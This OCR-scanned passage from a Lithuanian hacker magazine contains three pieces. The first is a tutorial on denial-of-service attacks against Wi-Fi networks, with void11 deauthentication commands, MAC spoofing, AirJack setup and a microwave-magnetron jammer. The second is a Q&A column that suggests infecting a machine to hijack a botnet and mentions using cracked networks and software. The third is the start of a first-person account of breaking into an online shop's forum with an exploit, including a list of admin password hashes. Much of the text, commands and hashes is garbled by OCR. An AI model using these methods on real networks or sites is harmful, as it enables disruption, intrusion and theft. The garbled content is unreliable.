KLĄ PAVERČIA JUOKŲ DARBU KIEKVIENAM 
BENT KIEK KVALIFIKUOTAM ĮSILAUŽĖLIUI. 


„DoS“ atakų prieš 


„WiFi“ tinklus aprašymas 

Mes jau rašėme apie klasikinius WiFi tinklų nulaužimo 
metodus: aprašėme WEP pažeidžiamumus, tinklo rak- 
tų nulaužimo procesą bei socialinės inžinerijos panau- 
dojimą. Tačiau realybė tokia, jog be šių metodų 802.11 
šeimos protokolai pažeidžiami ir su DoS atakomis, ku- 
rios leidžia užlaužti bet kurį priėjimo tašką, sutrikdyti 
tinklo funkcionavimą ir perimti duomenis. Apie šią grės- 
mę mes šiandien ir pakalbėsime. 


[Kam visa tai?] Kam vykdyti DoS atakas prieš WiFi? 


Siekiant išvesti tinklą iš rikiuotės? Taip, tačiau ne tik 


tam, — juk DoS ataka yra svarbi sudėtinė man-in- 
the-middle atakų dalis. Siaip jau šio tipo atakų apta- 
rimas — ištiso atskiro straipsnio tema, tačiau trumpai 


tariant, šios atakos esmė - 


pakeisti veikiantį priėji- 


mo prie tinklo tašką nuosavu. Norint atjungti teisėtą 
AP (access point), reikia ją užDOSinti ir taip išvesti ją 
iš rikiuotės. Sukurpti suklastotą priėjimo tašką ne taip 
jau sudėtinga, o svarbiausia šiuo atžvilgiu iškylanti pro- 
blema — įdiegiamo priėjimo taško parametrų (tokių, 
kaip ESSID, WER MAC) sutapimas su aukos AP para- 
metrais. Paprastesnė šios atakos versija gali apsiribo- 
ti kokio nors klientinio mazgo pakeitimu nuosavu, ką 
galima įvykdyti kur kas paprasčiau, kadangi čia įterpia- 
mo mazgo nereikia konfigūruoti kaip AP 0 tereikia imi- 
tuoti pageidaujamo pakeisti mazgo IP ir MAC. 


„WiFi -DoS“ klasifikacija 


Pakankamai logiška visas DoS atakas prieš WiFi suskirstyti į dvi grupes: 
* Atakos prieš vadinamąjį 1-ąjį arba fizinį lygi 


" Atakos prieš 2-ąji, programinį lygi 


Pirmojo tipo atakos turi dvi atmainas. Pirmoji — norimo sunai- 
kinti mazgo veikiančio dažnio bombardavimas skirtingu triukš- 
miniu srautu, kuris realiai yra paprasčiausios „informacinės šiukš- 
lės“. Tai tėra paprasčiausias floodas su atitinkamu srautu, kuris 
sukelia atsisakymą aptarnauti (Denial of Service). Antrosios at- 
mainos esmė specialių triukšmo generatorių, kurie veikiantį 
diapazoną pilnai užteršia trikdžiais ir taip užkerta kelią norma- 
liam darbui, panaudojimas. 

Programinio lygio atakos — tai skirtingų protokolų, servisų, au- 
tentifikacijos sistemų ir panašių dalykų pažeidžiamumų panau- 
dojimas. Šiame straipsnyje be atakų prieš pirmąjį lygi bus apta- 
riamos atakos, nukreiptos prieš belaidžių 802.11 tinklų proto- 
kolus. Iš čia galima pasiūlyti dar vieną atakų prieš WiFi protoko- 
lus klasifikaciją — priklausomai nuo belaidžio tinklo standarto. 
Šiandien naudojami šie 802.11 tinklų standartai: 802.11a, 


Lientėi:“ė seconfig ulanO mode nanaged 
1178 iucordia wlanū ap UOL(K [661 
vonfig land e551d buenosaireziitrė orą 
įuconfig wlan) kėų Off 
clientūi:" 
Lano 


Rx invalid nuid: 
Tx ercess1ve retries:0 


t: ir 131 
lientūię“e seonfią ulanėo netma:k 255,265,265,274 
clientūi: “e route add default gw 


ciientūi; "e 


Konfigūruojame hostap 


802.11b, 802.11g, 802.11i. Daugelis neseniai išleistos be- 
laidžiams tinklams skirtos įrangos orientuota į darbą su dviem 
pirmaisiais standartais. Būtent todėl labai dažnai jau sukurtų 
belaidžių tinklų administratoriai paprasčiausiai dėl ekonominių 
pnežasčių tiesiog neturi galimybės pereiti prie saugesnio 802.11g 
protokolo. Išsamiau aptarsime atakas prieš pirmąjį belaidžių 
tinklų lygi. 


[Slopinimas] Kaip žinai, WiFi tinklai naudoja 2,4-2,5 GHz daž- 
nių diapazoną. Aptarsime šiandien labiausiai paplitusį 802.11b 
standartą. Šiame standarte kanalo plotis siekia 22 MHz, mini- 
malus dažnių tarpas tarp kanalų 5MHz. Taip tampa įmano- 
mas duomenų perdavimas keturiolika kanalų, daugelis kurių 
smarkiai persidengia, dėl ko vienoje padengimo zonoje vienu 
metu normaliai veikti gali trys priėjimo taškai, kurių dažniai ne- 
persidengia arba persidengia labai menkai. Žvilgtelėk į atitinka- 
ma paveikslėlį ir visos aukščiau išsakytos minties esmė tau iš 
karto paaiškės :). 

Tarkim, mes norime atjungti priėjimo tašką nuo tinklo, kad po to 
Įvykdytume man-in-the-middle ataką. Tam mes pradėsime 
„šiukšlėmis“ pildyti tą kanalą, per kuri veikia šis priėjimo taškas. 
Tarkim, jis veikia šeštu kanalu (daugelyje priėjimo taškų šis kana- 
las priskirtas pagal nutylėjimą). Jeigu mes pradėtume šiuo kana- 
lu perdavinėti milžinišką nieko nereiškiančių 802.11 freimu kiekį 
su žymiu signalo galingumu (EIRP), tai su šiuo priėjimo tašku 
sąveikaujančiuose tinklo mazguose padidėtų BER (Basic Error 
Ratio — pagrindinis klaidos koeficientas). Didžioji belaidžiam ry- 
šiui skirtos irangos dalis tokiu atveju pradeda ieškoti galimybės 
susijungti per kaimyninius Kanalus, ir jeigu jie ten atranda priėji- 


mo tašką su tais pačiais ESSID, WEP (o jį jie ten ras, nes mes 
padarysime viską, kas įmanoma :) parametrais ir žemesniu BER, 
tai jie užmezga ryšį su šiuo tašku, tuo pačiu spjovę į teisėtą AP Tai 
veikia, tačiau su tam tikromis išlygomis. Visų pirma, kai kuriuos 
įrenginius galima sukonfigūruoti taip, kad jie nepriklausomai nuo 
BER lygio veiktų tik per vieną ir tą pati kanalą, kuo dažnai naudo- 
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jasi WiFi tinklų adminai. Tačiau tai pagrinde būdinga stacionariai 
įrangai — mobilūs tinklo mazgai praktiškai visada orientuojasi į 
sąveiką su priėjimo tašku per stabilų kanalą. 

Kaip matai, norint įvykdyti man-in-the-middle ataką, nebūtina 
net galutinai atjungti priėjimo taško nuo tinklo, pakanka viso 
labo užteršti jo darbinį Kanalą ir paleisti kitą, suklastotą AR ku- 
ris yra ne mažiau nei už penkių kanalų nuo slopinamo AP Tuo 
pačiu tokiam suklastotam mazgui būtų gerai panaudoti anteną 
su aukštu stiprinimo koeficientu. 

Jeigu čia pabandytume surasti analogiją su laidinių tinklų DoS 
atakomis, tai tokios atakos savo esme labiau primena Distribu- 
ted DoS, kur naudojama daug kompiuterių, generuojančių mil- 


Panaudojus iš mikrobangų krosnelės ištrauktą 
magnetroną galima sukurpti tikrą WF onėjimo taškų žudiką 


[Specifinės atakos] 

Galima pateikti daugybę atakų prieš tam tikrus specifinius 
nustatymus naudojančius tinklus koncepcijų. Pavyzdžiui, tin- 
kle gali būti įjungtas energijos taupymo režimas. Tada mazgai 
gali būti „miego“ režime, o priėjimo taškas kaups tokiam maz- 
gui skirtus freimus. Įsilaužėlis gali apsimesti tokiu miegančiu 
tinklo mazgu, 0 po to išeiti iš miegančio režimo, po ko jis 
gaus visus freimus, kurie buvo skirti „miegančiam“ mazgui. 
Dar vienas būdas, kurį įdarbinus galima pasalūniškais tiks- 
lais pasinaudoti miegančiu mazgo režimu — specialių tarny- 
binių priėjimo taško siunčiamų freimų su TIM (Traffic Indica- 
tion Map) padirbimas. AP „miegantiems“ tinklo mazgams siun- 
čia TIM freimus su pranešimu apie naujų šiam tinklo mazgui 
skirtų duomenų gavimą, kad jis „prabustų“ ir pasiimtų susi- 
kaupusią informaciją. Jeigu kaip nors pavyktų nutraukti tikrų- 
jų TIM freimų priėjimą prie tinklo mazgo, tai priėjimo taškas 
būtų priverstas naikinti susikaupusią ir dar miegančiam maz- 
gui neišsiųstą informaciją, kadangi jų saugojimui skirta ribota 
buferio erdvė. 


žinišką prieš auką nukreiptą tinklo srautą, kuris užverčia auką 
įvairiomis užklausomis ir panašiai. O mūsų atveju vietoje didelio 
atakuojančių kompiuterių skaičiaus įdarbinamas vienas, tačiau 
Jis panaudoja didelę signalo perdavimo galią. 

Dar vienas būdas „užversti“ 802.11 standarto tinklą - panau 
doti specialiai sukonstruotą „slopintuvą“, t.y. įrenginį, kuris tam 
tikrame dažnių diapazone generuoja triukšmus. Labai galingą 
triukšmų generatorių galima pasigaminti iš magnetrono — mMik- 
robangų krosnelėse naudojamo įrenginio. Įdomu tai, jog mag 
netronas veikia 2,445 GHz dažniu, plius minus keli megaher- 
cai, kurių gali būti ir ne keli. Spėk, koki kanalą jis perdengia 
pirmiausia? Be abejo, labiausiai naudojamą šeštą. 
Belaidžiai tinklai bejėgiai prieš pirmojo lygio atakas. Vienintelis 
dalykas, kurį galima padaryti — tai aptikti triukšmų šaltinį. Tai 
galima padaryti panaudojant trianguliacijos metodą, t.y. išma- 
tuojant triukšmų generatoriaus signalo lygį keliuose taškuose. 
Remiantis gautais duomenimis, galima pabandyti nustatyti slo- 
pinančio įrenginio buvimo vietą. 


[Buffer overflow] Taigi buferio perpildymas. Esmė tame, kad dau 
gelis priėjimo taškų, taip pat ir programinių, tam tikrą atminties 
į ) 
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Void1 1 išeities tekstai 


sritį išskiria prisijungimo užklausoms apdoroti ir autentifikuoti. Bu- 
feri perpildyti galima su programa Void11. Ši programa skirta dar- 
bui Linux sistemoje (reikalingos HostAP tvarkyklės ir plokštė su Prism 
mikroschemų rinkiniu). Toks įrankis tiesiog idealiai tinka DoS ata- 
koms organizuoti prieš belaidžius tinklus. Jis moka generuoti trijų 
tipų freimus: autentifikacijos, prisijungimo ir seanso nutraukimo 
užklausas. Jis taip pat moka atakuoti iš karto kelis tinklo mazgus, 
nurodyti vienu metu dirbančių srautų kiekį, užlaikymą tarp freimų 
išsiuntimo ir dar daug ką. Žodžiu, puikus dalykėlis. 


Dar viena priėjimo taško buferio perpildymo galimybė reikia 
prie jo prisijungti, 0 po to pradėti greitai keisti savo MAC. Kaip 
pakeisti savo tinklo plokštės MAC adresą? Elementaru! 


$ (fconfig wanO hw ether FFIFFIFFIFFIFF:FF 


Tai mes padarėme su ifconfig, analogiška operacija su iproute 
atliekama štai taip: 


nk set dev wanO address FF:FF:FF:FF:FF:FF 


Realizuoti greitą MAC adreso keitimą galima parašius nedidelį 
perl skriptą, ką ir padarė Džošua Raitas savo kūrinyje macfid.pl 
ji galima rasti autoriaus svetainėje — Attp://home.jwu.edu/ 
įwright/perl.htm). Norėdami įvykdyti skriptą, darom štai ką: 

šperi macfid.p! -< 1000 -1 10000 

Vėliavėlė -c parodo, kiek MAC adresų generuoti, -u skirta mik- 
rosekundėmis nurodyti užlaikymą prieš kito iš eilės MAC adreso 
generavimą. 


[Suklastoti freimai] Labiausiai paplites DoS atakų tipas — pa- 
siųsti didelį freimų kieki su seanso nutraukimo ir atsijungimo uUž- 
klausomis. Šios atakos esmė — pasirinktam tinklo mazgui arba 
mazgams išsiųsti seanso nutraukimo ir atsijungimo užklausas pri- 
ėjimo taško vardu, su jo MAC adresu. Atjungus tinklo mazgą ir 
pasisavinus jo MAC adresą, galima prisijungti prie belaidžio tinklo. 
Būtent taip hakeriai paprastai ir apeina MAC adresų filtraciją. 

Norint ilgesniam laikui atjungti pasirinktą tinklo mazgą, geriausia 
pasinaudoti void11. Žvilgtelėkime į šio įrankio veikimą. Tiesa, visų 
pirma reikia įdiegti HostAP tvarkykles. Surasti paskutinę jų versija 


802.11b standato kanalų talpa 


2482 
2472 
2462 
2,452 
2442 
2432 
2422 
2412 
2402 
Kanalai 


Dažnių pasiskirstymas 802.11 kanaluose 


Darbas su Iwconfig irankiu 


galima čia: http://hostap.epitest.fi. Kad void11 su ja dirbtų, būtina 
byloje driver/modules/hostap config.h apibrėžti PRISM2 HOSTAPD 
konstantą (tai daryti reikia tik ankstesnėse tvarkyklių versijose, 0 
naujesnėse jau nebe). Kompiliuojam root vardu: 


S make 88 make pccard 


Šis variantas skirtas PCMCIA plokštėms. Dabar reikia perleisti 
PCMCIA servisus ir įdėti plokštę į lizdą. Jeigu viskas praėjo sek 
mingai, tai plokštė pradės veikti priėjimo taško režimu. Plokštę 
galima sukonfigūruoti su Linux Wireless Extensions: 


S iwconfią 


Tu pamatysi plokštės darbo parametrus (jie imami iš /proc/net 
dev). Čia Mode:Master parametras reiškia, kad plokštė veikia 
priėjimo taško režime. Pakeisti šį režimą ir bet kokį kitą para 
metrą galima su komanda 


S iwconfig wlanO mode repeater channel 6 


Taip mes privertėme plokštę veikti kaip kartotuvą šeštu kanalu, 
Kaip jau minėjau, sukonfigūruoti priėjimo tašką visiškai nesu- 
dėtinga. Void11 susideda iš dviejų įrankių: void11 hopper ir 
void11 penetration. Hopper konfigūruoja plokštę, 0 penetra- 
tion reikalingas freimams generuoti. Pavyzdžiui, pabandykime 
atjungti tinklo mazgą su MAC adresu FF:FF:FF:FF:FF:FF, siųs- 
dami freimus adreso AA:AA:AA:AA:AA:AA vardu: 


void1] hopper > /dev/null 8 
void]! penetration —s AA:AA:AA:AA:AA:AA B FFFF-FF-FF-FF-FF D wlanO 


O štai buferio perpildymo atakos pavyzdys pagal adresų sąrašą, 
kuris yra byloje sarasas: 


void11 hopper > /dev/null 8 
void11 penetration 1 2 1 sarasas -D wlanO 

Aš nepradėsiu išsamiai pasakoti apie skirtingu šio įrankio vėlia- 
vėlių paskirtį ir šiaip bus geriau, jeigu tu pats visame tame susi- 
gaudysi (geriausia vėliavėlė — -h :). 

Judam toliau. Šią ataką galima sustiprinti siunčiant kartu su 
freimais, kuriuose yra atsijungimo arba seanso nutraukimo už- 
klausos. Taip pat tai galima padaryti siunčiant padirbtus atsaky- 
mus į testines atakuojamo tinklo mazgo užklausas, kurios šį 
mazgą nukreipia į tašką su neegzistuojančių ESSID ir nenaudo- 
jamu kanalu. Norint įvykdyti šią ataką, kaip Void11 priedą gali- 
ma panaudoti Black Alchemy Enterprises sukurtą per! skriptą 
fakeap.pl, kuris moka siųsti suklastotus freimus. Kaip ir void11, 
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fakeap naudoja HostAP tvarkykles. Prieš naudojimą šį skriptą 
teks šiek tiek pataisyti. Visų pirma, tai reikės padaryti su kinta- 
muoju $MAX CHANNEL, kurio reikšmė lygi 11, o turėtų būti 14 
(amerikiečių teisėsauga susiaurino WiFi naudojamų dažnių dia- 
pazoną, todėl ten maksimalus kanalų skaičius yra 11, 0 pas 
mus — 14). Gali būti, jog teks pakeisti kelius iki bylų, kurios 
aprašytos su kintamaisiais $IWCONFIG, $IFCONFIG, $CRYP- 
TCONF: Paleidžiam: 


Š peil fokeap.pl 


Kaip matai, parametre -channel mums reikės nurodyti kokį nors 
nenaudojamą kanalą bei su parametru -words nurodyti bylą su 
iš anksto paruoštu padirbtų ESSID sąrašu. 

Yra ir dar vienas suklastotus freimus naudojantis DoS atakų 
tipas. Jį savo programoje fata jack įgyvendino Markas Osbor- 
nas (Mark Osborne). Ši programa aukos tinklo mazgo vardu pri- 
ėjimo taškui siunčia autentifikacijos užklausą. Užklausa sufor- 
muota taip, kad AP atakuojamam mazgui grąžintų freimą su 
pranešimu apie klaidą ir nutrauktų su juo susijungimą, beje, 
pakartotinas tokio atjungto tinklo mazgo prisijungimas prie to 
paties AP pasidaro gana sudėtingas. 


[Orinis Džekas] Programa fata jack veikia su tvarkyklėmis, kurios 
pateikiamos kartu su programų AirJack komplektu. Turėčiau pa- 
stebėti, jog šis komplektas, ko gero, yra geriausias skirtingų 802.11 
freimų generavimo įrankis. Iš pradžių jis buvo kuriamas plokštėms 
su Prismll mikroschemų rinkiniu, tačiau jau dabar jį galima sukon- 
figūruoti ir plokštėms su Hermes mikroschemomis, o kūrėjai atei- 
tyje taip pat planuoja įdiegti ir suderinamumą su kitais mikrosche- 
mų rinkiniais. AirJack apjungia penkis įrankius: monkey jack, kuris 
skirtas man-in-the-middle atakoms vykdyti; jo modifikacijai crac- 
ker jack; essid jack, kuris skirtas paslėptam ESSID aptikti; 
wlan jack skirtas seanso nutraukimo freimams siųsti su suklasto- 
tu siuntėjo MAC. AirJack platinamas pagal GNU licenciją, o išeities 
tekstus galima gauti čia: http://802.11ninja.net/airjack. 

AirJack tvarkyklėms sukurta tokia nuostabi programa, kaip File2Air. 
Jos pavadinimas kalba pats už save -- ji oru perduoda bylas. Tuo 
pačiu ji negeneruoja 802.11 freimų, o tiesiog dvejetainę bylą 
perduoda į „eterį“. Šis įrankis skirtas tikriems hakeriams. Tu gali 
šešioliktainiame redaktoriuje pats sudaryti absoliučiai bet kokius 
freimus ir siusti juos nurodytu Kanalu, tuo pačiu nurodant užlaiky- 
mą, išsiuntimų kiekį ir kitus parametrus. Be abejo, būtina žinoti 
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skirtingus 802.11 standarto protokolus, tačiau įsivaizduok, Kaip 
su šiuo įrankiu patogu ieškoti naujų belaidžių tinklų pažeidžiamu- 
mų ir vykdyti atakas, kurioms dar nesukurti specializuoti įrankiai. 
Kartu su pirma šios programos versija buvo pateikiami viso labo 
trys dvejetainių bylų pavyzdžiai, kurių pritaikymas buvo aprašytas 
README byloje. Dabar jau galima rasti bylas su freimais, kurie, 
pavyzdžiui, skirti visoms aukščiau aprašytoms DoS atakoms vyk- 
dyti. Būtent todėl ši programa ir yra pats universaliausias WiFi 
hakerio įrankis, kuris tinka tiek atakoms prieš belaidžius tinklus, 
tiek ir jų apsaugai nuo įsiveržimų. Ji moka siųsti freimus net ir 
stebėjimo režimu, o tai leidžia reaguoti į įvairius tinklo įvykius, 
tam tikslui sukuriant nesudėtingus skriptus. 

AirJack kompiliuojama su standartine komanda make. Beje, gali 
būti, jog tau bus pateiktas pranešimas apie klaidą, kuri susijusi su 
„cmpxchhg“ simboliu. Ją galima ištaisyti iš byloje Makefile esančio 
kintamojo CFLAGS pašalinus vėliavėlę -Werrow. Po to reikia air- 
jack cs.o nukopijuoti į katalogą /lib/modules/branduolio versija/ 
pcmcia ir paleisti depmod. Po to kataloge etc/pcmcia reikia patai- 
syti bylas wlan-ng.conf ir config, pakeičiant visas bind prism2 cs 
eilutes į airjack cs. Dabar telieka plokštę ištraukti iš lizdo ir perleis- 
ti plokščių valdymo įrankį. Įdedame ja iš naujo ir įvykdome koman- 
dą Ismod. Jeigu viskas pavyko tvarkingai, tai vietoje modulio bus 
airjack-cs. Dabar reikia paleisti belaidės tinklo plokštės sąsają: 


S ifconfią a 
Žiūrim, ar atsirado ajO sąsaja, jei atsirado, tuomet ją aktyvuojame: 
S ifconfig aj0 up 


Telieka sukompiliuoti į AirJack įeinančius įrankius. Pereinamė į 
programos katalogo subkatalogą /tools, įvedame make, 0 po to 
dar ir make monkey jack. 


[Nerealizuotos atakos] Daugelis atakų prieš belaidžius tin- 
klus egzistuoja kol kas tik teoriškai. Tiesiog nėra joms įvykdyti 
skirtų įrankių (ar bent jau aš apie tai nežinau, 0 kas nors išsi- 
juosęs jau DoS'ina šiais naujais būdais, nors gali būti ir taip, jog 
jie taip ir liks tik teoriniai). 

Viena iš nerealizuotų DoS atakų prieš WiFi — siunčiamų freimų 
kontrolinių sumų (CRC-32) pakeitimas, dėl ko paskirties tinklo 
mazgas tokio freimo nepriima. Tuo pat metu siuntėjui išsiunčia- 
mas suklastotas freimas su sėkmingo freimo priėmimo patvirti- 
nimu, kuris iš tikrųjų tiesiog ištirpo ore. Šios atakos sudėtingu- 
mas tame, kad trikdžius reikia sugeneruoti tiksliai freimo kontro- 
linės sumos (keturi paskutiniai baitai) perdavimo momentu. 
Panašią ataką siūloma panaudoti prieš 802.11i standarto tin- 
klus. Tiktai čia reikia iškreipti kontrolinę sumą, kuri patvirtina 
TKIP protokolo pranešimo vientisumą (MIC — Message Integri- 
ty Checksum). Standarte apibrėžta, kad jeigu per vieną sekun- 
dę bus priimtas daugiau nei vienas freimas su neteisingu MIC, 
tai toks tinklo mazgas bus atjungtas minutei, o po to jis galės 
prisijungti su nauju seanso raktu. 


[Pabaiga] Noriu pasakyti, kad aš parašiau toli gražu ne apie visas 
įmanomas Denial of Service rūšis, kurios skirtos 802.11 standar- 
to belaidžiams tinklams. Dar noriu pasakyti, kad DoS atakos prieš 
tinklus nėra gerai, todėl neverta DoSinti tinklų vien tik todėl, jog tu 
nesugebėjai į juos įsiskverbti arba iš neturėjimo ką veikti. 


Noriu sukurti savo botą ir išmokti jį įdieginėti kitose 
mašinose. Kaip galima kuo išsamiau išstudijuoti jau 
sukurtus pavyzdžius? 
Konkretūs šios srities patarimai kainuoja nemažus pini- 
gus, todėl tau teks susiprasti pačiam. Savaime supranta- 
ma, pirmiausia tau reikia užsikrėsti. Tam sistema reikia 
sukonfigūruoti iki tokio saugumo lygio, kuris tave domina. Po 
to reikia įdiegti HTTP srauto tyrinėjimui skirtą programinę įran- 
gą, išjungti visus antivirusus, anti-spyware programas ir iške- 
liauti panaršyti po visas pomografijos svetaines, ieškoti ware- 
z0, landžioti po skirtingus katalogus ir t.t. Visa tai skirta vienam 
tikslui: pasigauti užkratą ir pradėti jį studijuoti. 
Visų pirma, kai pajausi, kad pasigavai trojaną, reikia Su- 
prasti, kaip būtent tu užsikrėtei. Akivaizdu, jog tam reikės 
atidžiai išstudijuoti užkrėsto puslapio htm/ kodą ir pabandy- 
ti ten surasti eksploitą, kuris ir įkėlė tau tą bjaurybę. 
O tada su bet kokiu sniferiu bus galima pažiūrėti, apie ką 
tavo kompiuteryje apsigyvenęs žvėriukas kalbasi su savo in- 
terneto komandiniu punktu, koks tam naudojamas proto- 
kolas, ir iš viso, kokią informaciją kirminas perduoda. Su 
šiais duomenimis tu sugebėsi ne tik perimti dalį patirties, 
bet ir užgrobti svetimą botnetą. 


blema: tingisi kiekvieną kartą rankiniu būdu aprašinėti 
visus nustatymus. Juk DHCP yra ne visur! Ar galima 
kaip nors automatizuoti šį procesą? 


(0) Nulaužiau keletą Wi-Fi tinklų ir susidūriau su tokia pro- 


Sprendžiant pagal viską, tau nėra pažįstama tokia są- 

voka, kaip laptop roaming. O juk yra ištisa serija spren- 

dimų, leidžiančių „veikimo metu“ (on the fly) perjungti 
tavo nešiojamąjį kompiuterį iš vieno tinklo į kitą. Pavyzdžių 
toli ieškoti nereikia: MultiNetworkManager (www.globe- 
soft.com) leis tau automatizuoti persijungimą tarp tinklų, kuo- 
met tu iš darbo važiuoji namo, pakeliui dirbdamas nulauž- 
tuose tinkluose :). Jeigu ši programa netiks tavo skoniui, tai 
svetainėje rasi išsamią dokumentaciją nešiojamųjų kompiu- 
terių roaming'o klausimu: specialistai tokį sprendimą gali 
greitai realizuoti, pasinaudoję sisteminiais skriptais. Vaistai 
nuo godumo 8.* versijai kol kas dar neišleisti, tačiau tai 
netrukdo už dyką pasinaudoti septinta programos versija. 


Kokius dar radijo siųstuvus amerikiečiai ruošiasi mon- 
tuoti į pasus, taip siekdami padidinti saugumą? 


() Vakar jie iš visų Amerikos svečių pradėjo reikalauti pirštų 


antspaudų, o šiandien jau planuoja įdieginėti RFID mik- 

roschemas, kuriose bus saugoma visa paso informa- 
cija apie jo savininką. Duomenis bus galima nuskaityti su 
specialiu radijo skeneriu. Vienoje nesenai vykusioje saugu- 
mo konferencijoje vienas iš tyrinėtojų vaizdžiai parodė, kad 
galima elementariai nuskaityti informaciją apie pasą: žmo- 
gelis išmoko tai daryti savarankiškai, pasitelkęs nesudėtin- 
gą įrangą. Taigi duomenų perdavimo formato saugumas ke- 
lia rimtų klausimų. Ne mažiau klausimų kyla ir teisėsaugi- 
ninkams, kurie naujoje sistemoje mato galimybę kontroliuoti 
piliečius ir jų judėjimo maršrutus. Pirmais bandomaisiais triu- 
šiais taps teisėsaugininkai ir diplomatai, kurie estafetę pa- 
prastiems mirtingiesiems turėtų perduoti kitais metais. 


atais? 


(0) Kaip WarCraft supranta, kad aš naudojuosi che- 


Ilgokai vartotojai piktinosi kai kurių žaidėjų pranašu- 
mu, kurie nesikuklino naudotis programomis sukčia- 


vimui, kad galėtų įsigyti visas įmanomas žaidimų Civi- 

lizacijos gėrybes. Paskutinės World of Warcraft kūrėja 
Blizzard atsiliepė į šių ypatingai pergyvenančių dėl šios pro- 
blemos žaidėjų skundus ir išleido savo spyware — progra- 
mą-šnipą, kuri pateikiama kartu su pagrindiniu žaidimu ir 
vadinasi Warden. Ji išstudijuoja tavo procesus, įvertina at- 
minties apkrovimą ir apriboja tavo priėjima prie cheatų. Aš 
kol kas nemačiau paruoštų šios programos eliminavimo prie- 
monių, tačiau galiu savo bei visų skaitytojų žvilgsnį nukreipti 
į programą The Governor, kuri parodo visus Warden'o veiks- 
mus — Wwww.rootkit.com/newsread.php?newsid=371. 
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Stambus pirkinys 

NE TAIP SENIAI MES GAVOME NUOSTABŲ 
LAIŠKĄ. VIENAS HAKERIS, KURIS PRAŠĖ NE- 
IŠDUOTI JO VARDO, APRAŠĖ NEPAPRASTĄ 
INTERNETO PARDUOTUVĖS NULAUŽIMĄ IR 
PAGEIDAVO, KAD MES ŠIĄ ISTORIJĄ PA- 
SKELBTUME ŽURNALE. PATS LAUŽIMO 
PROCESAS BUVO LABAI ĮDOMUS IR PATVIR- 
TINTAS REALIAIS DUOMENIMIS, TODĖL MES 
BE JOKIŲ ABEJONIŲ PATIKĖJOME MŪSŲ 
SKAITYTOJU IR SUTEIKĖME JAM GALIMY- 
BĘ PAPASAKOTI APIE SAVO ZYGDARBĮ| — 
APIE STAMBIOS INTERNETO PARDUOTUVĖS 
NULAUŽIMĄ. KĄ, SEILĖ NUTĮSO? :) 


Rusiškos interneto 


parduotuvės nulaužimo istorija 

[Šauni pradžia] Vieną gražią vasaros dieną, kai visi nor- 
malūs žmonės pramogauja kur nors gamtoje, aš sėdė- 
jau tvankiame kambaryje ir, keikdamas savo gyvenimo 
būdą, baigiau savo eilinį užsakytą įsilaužimą. Užsakovas 
pasirodė besąs adekvatus žmogus, todėl užmokėjo iš kar- 
to bei už greitą darbą pridėjo papildomus 100 dolerių. 
Įkritus tokiai svariai sumelei į mano WebMoney sąskaitą, 
užsimaniau nusipirkti kokį nors naują kieta daiktą savo 
kompiuteriui. Išsigryninti pinigus tingėjau, todėl nuspren- 
džiau apsipirkti elektroninėje parduotuvėje. Užėjęs į 
Yandex, susidūriau su solidžiu stambių tinklo parduotuvių 
sąrašu ir pasirinkau vieną iš jų. Toliau situacija rutuliojosi 
labai įdomiai. Aš peržiūrėjau aparatūros kainoraščius ir 
jau apsisprendžiau dėl pirkinio, nuspaudžiau mygtuka 
„Apiforminti“ ir pamačiau, kad mokėti teks arba per tau- 
pomąją kasą, arba pavedimu. Vis dėlto paskutinėje pus- 
lapio eilutėje aš pamačiau tekstą, tvirtinantį, kad par- 
duotuvės administracija taip pat priima apmokėjimus vir- 
tualiais pinigais, tačiau be automatinio sandėrio apifor- 
minimo. Kitaip tariant, ryte pinigai, o vakarė kėdės, 
nes šie vaikinai tikriausiai nieko negirdėjo apie automa- 
tinius apmokėjimus ir jų apiforminimą :(. Deja, tokius 
viduramžiškus apmokėjimo metodus praktikuoja dauge- 
lis virtualių parduotuvių, kas vargu ar puošia internetą. 
Tuo istorija nesibaigė. Dar viena eilute žemiau aš pa- 
mačiau tokį skelbimą: „Jeigu jums iškilo problemų arba 
klausimų — parašykite apie tai į mūsų forumą“. Oho, 
pasirodo, jie dar turi forumą! Tuojau pažiūrėsim. Spus- 
telėjęs ant nuorodos, aš pakliuvau į labai įdomų foru- 


mą, kuris vadinosi Invision Power Board. Reikia pasakyti, kad 
aš turiu patirties saugumo klausimuose žmogus, todėl žinau, 
kuo kasdien pasipildo bugtrag sąrašai. Prieš dvi dienas aš sker- 
džiau eksploito, skirto /PB 1.3-2.0.3 versijoms, kodą, kuris pa- 
sirodė esąs labai efektyvus. Iš pradžių pamaniau, kad admi- 
nistracija tiesiog pakeitė versija, norėdama atbaidyti hakerius, 
tačiau pagal savo išorę IPB iš tiesų priklausė pirmajai produkto 
šakai. Nieko nelaukęs nusprendžiau pabandyti nulaužti šį suse- 
nusi forumą su RST kūriniu. 

Paleidau eksploitą su parametrais www.cool-eshop.ru /magfo- 
rum 1 1, kur skaičiai reiškė versijos numerį ir vartotojo id, kurio 
slaptažodį reikia gauti. Po trisdešimties perrinkimo sekundžių 
skriptas man grąžino admino slaptažodžio MD5 hešą. Dabar aš 
turėjau dvi galimybes: arba pabandyti pakeisti savo sausainuką 
(cookie) ir prisijungti administratoriaus vardu, arba iššifruoti slap- 
tažodį ir panaudoti jį kitais tikslais. Šiek tiek pagalvojęs, nu- 
sprendžiau apsistoti ties antruoju variantu, kadangi man nesi- 
norėjo eilinį kartą išsidavinėti per WWW, o ir šiaip, žinodamas 
IPB administravimo galimybes, aš spėjau, kad čia ypatingų re- 
zultatų vis tiek nepavyks pasiekti. Nulaužti hešą buvo visai rea- 
lu, kadangi pirmojoje forumo versijoje slaptažodis hešuojamas 
vieną kartą (antrojoje forumo versijoje pateiktą MD5 hešą rei- 
kia dešifruoti du kartus, kas praktiškai neimanoma). Pakartojęs 


veiksmus su eksploitu pirmiesiems 6-iems identifikatoriams (visi 
jie buvo adminai), aš surinkau login:md5 password poras ir 
išsaugojau jas į atskirą byla: 


[Byla su adminų hešais] 
dmin:0di7fb(7ce7188983d9719447a0f7ele 
nagadm:2001312706806211171c71502e87d465 
fokus:6940e8e23f2ec982b3e1831769169d 
naster:c0891b7ad2ad1c87b8ca19cd4c7hb792 
vuv:2603b[5047468416202f60258394099c 


ĮSmegenų šturmas| Tradiciškai md5 slaptažodžių nulaužimui 
aš naudoju programą MD5Inside. Ji jau mane gelbėjo daug 
kartų, todėl jai pelnytai priklauso geriausio brutforserio statu- 
sas. Tačiau šį kartą manęs neišgelbėjo jokie slaptažodžiai 

parinkimas su kiekvienu iš jų nedavė teigiamų rezultatų. Aš ne- 
norėjau MD5Inside (http://nsd.ru/soft/1/ano/md5inside.zip) pa- 
leisti visų variantų perrinkimo režime procesas galėjo trukti 
labai ilgai, o sugauti laimės paukštę norėjosi Kuo greičiau. Vis 
